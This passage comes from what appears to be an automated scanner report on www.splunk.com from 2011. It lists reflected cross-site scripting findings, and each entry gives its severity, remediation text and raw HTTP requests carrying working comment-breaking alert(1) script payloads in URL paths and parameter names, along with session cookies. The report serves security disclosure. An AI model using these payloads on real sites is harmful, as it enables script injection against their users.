GET /view/long-tail/SP-CAAAE7F85de3--><script>alert(1)</script>3571f6545de HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.571. http://www.splunk.com/view/long-tail/SP-CAAAE7F [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/long-tail/SP-CAAAE7F
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8a1f0--><script>alert(1)</script>5a312b3cb47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/long-tail/SP-CAAAE7F?8a1f0--><script>alert(1)</script>5a312b3cb47=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:16:13 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 72c321fdf9581667fdac28c406835d9a1296944174 Last-Modified: Sat, 05 Feb 2011 22:16:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40975
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 4319d--><script>alert(1)</script>c64dabdb035 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view4319d--><script>alert(1)</script>c64dabdb035/operational-intelligence/SP-CAAAFVM HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:03:16 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 4023dc159e9b83d168f95b1fa75b8ff71297008196 Last-Modified: Sun, 06 Feb 2011 16:03:16 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload edb7d--><script>alert(1)</script>579a2b57a1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/operational-intelligenceedb7d--><script>alert(1)</script>579a2b57a1d/SP-CAAAFVM HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:03:39 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: e96a24ae34b1bce7f5c6f052169ac2121297008220 Last-Modified: Sun, 06 Feb 2011 16:03:40 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload a74fe--><script>alert(1)</script>40c1e0236d0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/operational-intelligence/SP-CAAAFVMa74fe--><script>alert(1)</script>40c1e0236d0 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:04:04 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 85513a3ad631e0b73124ee10794176841297008245 Last-Modified: Sun, 06 Feb 2011 16:04:05 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.575. http://www.splunk.com/view/operational-intelligence/SP-CAAAFVM [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/operational-intelligence/SP-CAAAFVM
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8d22f--><script>alert(1)</script>7fb96a5a4c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/operational-intelligence/SP-CAAAFVM?8d22f--><script>alert(1)</script>7fb96a5a4c5=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:02:50 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: d4e17969e3e731fa2654310d806a351b1297008170 Last-Modified: Sun, 06 Feb 2011 16:02:50 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 32287
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 7ee0d--><script>alert(1)</script>90cf28c60a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view7ee0d--><script>alert(1)</script>90cf28c60a4/partner-directory/SP-CAAABCY HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload fa6a6--><script>alert(1)</script>bca2a328383 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/partner-directoryfa6a6--><script>alert(1)</script>bca2a328383/SP-CAAABCY HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:18:00 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:48:00 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:48:00 GMT; path=/ ETag: d4a72a1859cc3eec633d6a46b6a389671296944281 Last-Modified: Sat, 05 Feb 2011 22:18:01 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload b6f96--><script>alert(1)</script>eccde78041c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/partner-directory/SP-CAAABCYb6f96--><script>alert(1)</script>eccde78041c HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:18:33 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:48:33 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:48:33 GMT; path=/ ETag: dc0ae186bafdfcac90974860acc726351296944314 Last-Modified: Sat, 05 Feb 2011 22:18:34 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.579. http://www.splunk.com/view/partner-directory/SP-CAAABCY [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/partner-directory/SP-CAAABCY
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload f9453--><script>alert(1)</script>a09244ca107 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/partner-directory/SP-CAAABCY?f9453--><script>alert(1)</script>a09244ca107=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:16:42 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 82487
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 6c8f0--><script>alert(1)</script>4a32196ba0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view6c8f0--><script>alert(1)</script>4a32196ba0d/partner-programs/SP-CAAACED HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:18:29 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:48:29 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:48:29 GMT; path=/ ETag: 704408babd820f22c45c2118cc4ecc581296944310 Last-Modified: Sat, 05 Feb 2011 22:18:30 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18399
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 4b65f--><script>alert(1)</script>5ef7156cb2e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
